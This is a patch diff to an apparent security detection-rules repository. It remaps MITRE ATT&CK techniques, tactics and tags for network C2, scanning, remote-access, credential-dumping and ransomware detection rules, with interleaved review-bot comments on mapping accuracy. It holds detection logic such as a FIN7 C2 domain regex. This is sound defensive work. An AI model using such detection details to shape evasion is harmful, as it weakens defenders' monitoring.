@@ -87,19 +87,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" +[[rule.threat.technique.subtechnique]] +id = "T1573.002" +name = "Asymmetric Cryptography" +reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_fin7_c2_behavior.toml b/rules/network/command_and_control_fin7_c2_behavior.toml index 038ab832275..8a8e20de3b8 100644 --- a/rules/network/command_and_control_fin7_c2_behavior.toml +++ b/rules/network/command_and_control_fin7_c2_behavior.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -43,24 +43,28 @@ destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destinati [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_halfbaked_beacon.toml b/rules/network/command_and_control_halfbaked_beacon.toml index 1330bc27526..929355c8b37 100644 --- a/rules/network/command_and_control_halfbaked_beacon.toml +++ b/rules/network/command_and_control_halfbaked_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -80,24 +80,18 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique]] -id = "T1568" -name = "Dynamic Resolution" -reference = "https://attack.mitre.org/techniques/T1568/" [[rule.threat.technique.subtechnique]] -id = "T1568.002" -name = "Domain Generation Algorithms" -reference = "https://attack.mitre.org/techniques/T1568/002/" - - +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_nat_traversal_port_activity.toml b/rules/network/command_and_control_nat_traversal_port_activity.toml index e70052c7f23..8a8f0d1a7d7 100644 --- a/rules/network/command_and_control_nat_traversal_port_activity.toml +++ b/rules/network/command_and_control_nat_traversal_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,8 +75,12 @@ IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by e [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_port_26_activity.toml b/rules/network/command_and_control_port_26_activity.toml index 2f266661300..68fd2ce302f 100644 --- a/rules/network/command_and_control_port_26_activity.toml +++ b/rules/network/command_and_control_port_26_activity.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,20 +75,22 @@ SMTP, typically operating on port 25, is crucial for email transmission. However [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.003" +name = "Mail Protocols" +reference = "https://attack.mitre.org/techniques/T1071/003/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml index 1c67c535c25..543c85bbf79 100644 --- a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml +++ b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -31,7 +31,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 47 rule_id = "8c1bdde8-4204-45c0-9e0c-c85ca3902488" severity = "medium" -tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: PAN-OS", "Resources: Investigation Guide"] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -113,32 +113,12 @@ RDP allows administrators to remotely manage systems, but exposing it to the int [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml index bdb7850821e..d484d333516 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml 
+++ b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "5700cb81-df44-46aa-a5d7-337798f53eb8" severity = "high" -tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -108,26 +108,26 @@ VNC allows remote control of systems, facilitating maintenance and resource shar [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1219" -name = "Remote Access Tools" -reference = "https://attack.mitre.org/techniques/T1219/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml index 99c927ca904..da5ce08b9b3 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -109,14 +109,18 @@ VNC is a tool that allows remote control of computers, often used by administrat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique.subtechnique]] +id = "T1219.003" +name = "Remote Access Hardware" +reference = "https://attack.mitre.org/techniques/T1219/003/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/discovery_potential_network_sweep_detected.toml b/rules/network/discovery_potential_network_sweep_detected.toml index 0659815cbd5..e466d21230d 100644 --- a/rules/network/discovery_potential_network_sweep_detected.toml +++ b/rules/network/discovery_potential_network_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
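Review bot: T1219.003 Remote Access Hardware, added in the VNC-to-the-internet hunk as a sub-technique of T1219, covers physical devices such as IP-KVMs and hardware implants, not a VNC client session leaving the network; the software case is T1219.002 Remote Desktop Software. Change the new block to `id = "T1219.002"`, `name = "Remote Desktop Software"`, `reference = "https://attack.mitre.org/techniques/T1219/002/"` so the rule does not count toward hardware-implant coverage.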
@@ -22,14 +22,7 @@ name = "Potential Network Sweep Detected" risk_score = 21 rule_id = "781f8746-2180-4691-890c-4c96d11ca91d" severity = "low" -tags = [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" -] +tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" query = ''' @@ -90,25 +83,6 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [rule.threshold] field = ["source.ip"] value = 1 diff --git a/rules/network/discovery_potential_port_scan_detected.toml b/rules/network/discovery_potential_port_scan_detected.toml index 872921d9502..39833c138f6 100644 --- a/rules/network/discovery_potential_port_scan_detected.toml +++ b/rules/network/discovery_potential_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -22,14 +22,7 @@ name = "Potential Network Scan Detected" risk_score = 21 rule_id = "0171f283-ade7-4f87-9521-ac346c68cc9b" severity = "low" -tags = [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" -] +tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -97,21 +90,3 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/network/discovery_potential_syn_port_scan_detected.toml b/rules/network/discovery_potential_syn_port_scan_detected.toml index 42cfe232eed..10e3cd3c7c2 100644 --- a/rules/network/discovery_potential_syn_port_scan_detected.toml +++ b/rules/network/discovery_potential_syn_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -93,16 +93,10 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" - [rule.threshold] field = ["destination.ip", "source.ip"] value = 1 diff --git a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml index 83e4f3cdfb2..1480a6797d8 100644 --- a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml +++ b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,19 +95,23 @@ FROM logs-fortinet_fortigate.* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/initial_access_react_server_components_rce_attempt.toml b/rules/network/initial_access_react_server_components_rce_attempt.toml index 3742e5f28eb..6acf88afcb6 100644 --- a/rules/network/initial_access_react_server_components_rce_attempt.toml +++ b/rules/network/initial_access_react_server_components_rce_attempt.toml 
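Review bot: Adding T1190 Exploit Public-Facing Application to the FortiGate SSO-login-from-unusual-source rule (the `@@ -95,19 +95,23 @@` hunk) asserts that the alert evidences exploitation of a vulnerability, which a successful SSO login from a new source does not; that signal is the T1078 / T1078.004 Valid Accounts story already in the mapping. Unless the ES|QL query, which is outside this hunk, also matches exploit indicators, I would drop the new `[[rule.threat.technique]]` block for T1190 so the rule does not inflate exploitation coverage metrics. If it is kept, the rule description should state what exploitation behaviour the query actually observes.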
@@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/12/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,31 +93,31 @@ network where http.request.method == "POST" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/network/initial_access_react_server_rce_network_alerts.toml b/rules/network/initial_access_react_server_rce_network_alerts.toml index c319a5afcc6..0005908b26e 100644 --- a/rules/network/initial_access_react_server_rce_network_alerts.toml +++ b/rules/network/initial_access_react_server_rce_network_alerts.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["panw", "cisco_ftd", "fortinet_fortigate", "suricata"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,20 +55,7 @@ references = [ risk_score = 73 rule_id = "1aefed68-eecd-47cc-9044-4a394b60061d" severity = "high" -tags = [ - "Domain: Network", - "Domain: Application", - "Domain: Web", - "Use Case: Threat Detection", - "Use Case: Vulnerability", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: PAN-OS", - "Data Source: Fortinet", - "Data Source: Suricata", - "Data Source: Cisco FTD", - "Resources: Investigation Guide", -] +tags = ["Domain: Network", "Domain: Application", "Domain: Web", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Initial Access", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: Suricata", "Data Source: Cisco FTD", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,31 +69,13 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml index 492129f623e..57bd58826e7 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,13 @@ RPC enables remote management and resource sharing, crucial for system administr [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml index 2072a632c94..c2559471478 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "32923416-763a-4531-bb35-f33b9232ecdb" severity = "high" -tags = ["Tactic: Initial Access", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -100,14 +100,26 @@ RPC enables remote management and resource sharing across networks, crucial for [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml index 18f1e6a95d9..0d15c5e57be 100644 --- a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml +++ b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
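Review bot: The new Lateral Movement entry maps outbound RPC to the internet to T1021 Remote Services, but T1021 describes an adversary logging into other systems inside the environment; an RPC session leaving the perimeter is already covered by the Command and Control entry this hunk adds (T1071). Unless the query is also meant to fire on internal-to-internal RPC, which the hunk does not show, I would drop the second `[[rule.threat]]` block and the matching `Tactic: Lateral Movement` tag added in the earlier hunk for this file. Note the filename `initial_access_rpc_remote_procedure_call_to_the_internet.toml` no longer matches any tactic the rule claims.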
@@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana-
 risk_score = 47
 rule_id = "c82b2bd8-d701-420c-ba43-f11a155b681a"
 severity = "medium"
-tags = ["Tactic: Initial Access", "Domain: Network", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"]
+tags = ["Domain: Network", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: PAN-OS", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -101,30 +101,16 @@ SMB, a protocol for sharing files and resources within trusted networks, is vuln
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1048"
 name = "Exfiltration Over Alternative Protocol"
 reference = "https://attack.mitre.org/techniques/T1048/"
-
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
-
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["source.ip"]
diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml
index 3e4f65b7211..d3e5aeaf8b8 100644
--- a/rules/network/initial_access_unsecure_elasticsearch_node.toml
+++ b/rules/network/initial_access_unsecure_elasticsearch_node.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/11"
 integration = ["network_traffic"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,7 +66,7 @@ references = [
 risk_score = 47
 rule_id = "31295df3-277b-4c56-a1fb-84e31b4222a9"
 severity = "medium"
-tags = ["Use Case: Threat Detection", "Tactic: Initial Access", "Domain: Endpoint", "Resources: Investigation Guide"]
+tags = ["Use Case: Threat Detection", "Domain: Endpoint", "Tactic: Reconnaissance", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -79,14 +79,13 @@ query = '''
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
+[[rule.threat.technique]]
+id = "T1595"
+name = "Active Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
+id = "TA0043"
+name = "Reconnaissance"
+reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml
index d38cd884d91..41db6231b23 100644
--- a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml
+++ b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -73,19 +73,13 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
-[[rule.threat.technique.subtechnique]]
-id = "T1003.001"
-name = "LSASS Memory"
-reference = "https://attack.mitre.org/techniques/T1003/001/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/promotions/endgame_ransomware_detected.toml b/rules/promotions/endgame_ransomware_detected.toml
index 9f8c169466d..f52d51ab54c 100644
--- a/rules/promotions/endgame_ransomware_detected.toml
+++ b/rules/promotions/endgame_ransomware_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 maturity = "production"
 promotion = true
-updated_date = "2025/03/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ setup = """## Setup
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "critical"
-tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"]
+tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
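Review bot: Removing the `T1003.001` LSASS Memory sub-technique leaves `credential_access_endgame_cred_dumping_detected.toml` mapped only to the parent T1003, which is a loss of precision rather than a tag/tactic fix, and nothing in the patch says why. If the Endgame credential-dumping alert covers dumping paths beyond LSASS, the parent-only mapping is right but deserves a line in the PR description; if it is LSASS-specific, keep the sub-technique, as the permission-theft rules later in this patch gain sub-techniques rather than drop them.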
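Review bot: The rewritten `tags` line in the `@@ -25` hunk puts `Tactic: Impact` first, and the promotions rules that follow do the same with their `Tactic:` entries, whereas the network rules earlier in the patch place them after `Use Case: Threat Detection` and the windows rules keep them mid-list after `Tactic: Collection`. If the repository has a preferred tag order, apply it uniformly across this PR; if it does not, this is cosmetic, but one ordering would make the tag/tactic changes easier to review.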
@@ -67,3 +67,15 @@ Elastic Endgame is a security solution designed to detect and respond to threats
 - Enhance monitoring and detection capabilities by configuring alerts for similar event patterns and behaviors identified in the query fields.
 - Report the incident to relevant authorities and stakeholders as per organizational policy and legal requirements, ensuring compliance with any regulatory obligations."""
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1486"
+name = "Data Encrypted for Impact"
+reference = "https://attack.mitre.org/techniques/T1486/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
